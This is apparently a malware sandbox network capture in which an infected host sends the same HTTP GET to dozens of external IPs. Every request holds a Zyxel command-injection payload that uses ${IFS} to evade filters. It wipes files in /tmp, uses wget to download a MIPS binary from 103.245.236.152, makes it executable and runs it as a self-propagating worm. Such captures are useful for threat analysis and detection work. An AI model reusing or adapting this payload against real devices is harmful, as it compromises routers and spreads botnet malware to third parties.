                                            Jan 14, 2024 15:50:38.393975019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3954192.168.2.2340078117.48.29.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393985987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3955192.168.2.2345258123.106.192.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394013882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3956192.168.2.2350928195.15.142.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394064903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3957192.168.2.2353576107.195.169.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394077063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3958192.168.2.234540463.109.197.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394088984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3959192.168.2.2353190201.239.121.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394117117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3960192.168.2.2348328201.227.0.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394144058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3961192.168.2.234734074.208.255.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394197941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3962192.168.2.233998874.79.26.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394201994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3963192.168.2.2351144219.62.29.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394229889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3964192.168.2.2348410154.209.85.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394262075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3965192.168.2.234026661.237.44.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394325018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3966192.168.2.2334224212.230.125.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394335985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3967192.168.2.2353912211.70.175.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394370079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3968192.168.2.234289274.225.42.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394395113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3969192.168.2.233386087.119.179.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394428015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3970192.168.2.234898824.58.230.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394465923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3971192.168.2.2347324156.182.92.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394488096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3972192.168.2.2356808157.255.124.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394529104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3973192.168.2.2360546223.134.109.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394551992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3974192.168.2.2338430185.88.124.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394575119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3975192.168.2.234637277.79.209.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394629002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3976192.168.2.2354516125.81.214.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394648075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3977192.168.2.234084084.134.85.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394670010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3978192.168.2.234509259.148.121.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394695997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3979192.168.2.235925260.84.102.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394699097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3980192.168.2.2337136187.64.176.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394751072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3981192.168.2.2349852137.113.216.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394812107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3982192.168.2.2334142136.191.132.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394840002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3983192.168.2.2348252209.49.252.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394865036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3984192.168.2.2344628176.255.252.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394900084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3985192.168.2.2349874116.72.120.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394920111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3986192.168.2.2359506160.172.49.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394936085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3987192.168.2.2351802157.213.44.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.394973040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3988192.168.2.2356692193.54.155.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395004034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3989192.168.2.2345352114.230.50.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395009995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3990192.168.2.2349018122.32.230.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395042896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3991192.168.2.23331201.102.125.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395080090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3992192.168.2.235091092.234.17.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395081997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3993192.168.2.2351404219.189.13.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395106077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3994192.168.2.2348234155.35.152.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395139933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3995192.168.2.2350376209.22.240.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395175934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3996192.168.2.235973686.202.16.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395193100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3997192.168.2.2342416168.5.81.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395209074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3998192.168.2.2337776156.134.205.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395248890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3999192.168.2.234445444.238.84.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395303011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4000192.168.2.2343692180.189.184.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395324945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4001192.168.2.2360054174.173.105.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395370007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4002192.168.2.2359478102.29.44.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395391941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4003192.168.2.2356922147.4.200.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395438910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4004192.168.2.2341432126.185.76.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395442009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4005192.168.2.234383873.154.251.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395479918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4006192.168.2.2348168220.129.203.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395512104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4007192.168.2.23579408.26.44.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395530939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4008192.168.2.236068445.252.65.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395555973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4009192.168.2.2356128207.110.107.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395556927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4010192.168.2.2342606190.22.238.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395597935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4011192.168.2.234218258.223.151.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395612001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4012192.168.2.2340410192.202.13.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395632029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4013192.168.2.2360860125.91.95.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395649910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4014192.168.2.2340234207.186.203.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395675898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4015192.168.2.2335844110.236.157.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395689011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4016192.168.2.2347416103.35.6.136443
                                            TimestampBytes transferredDirectionData
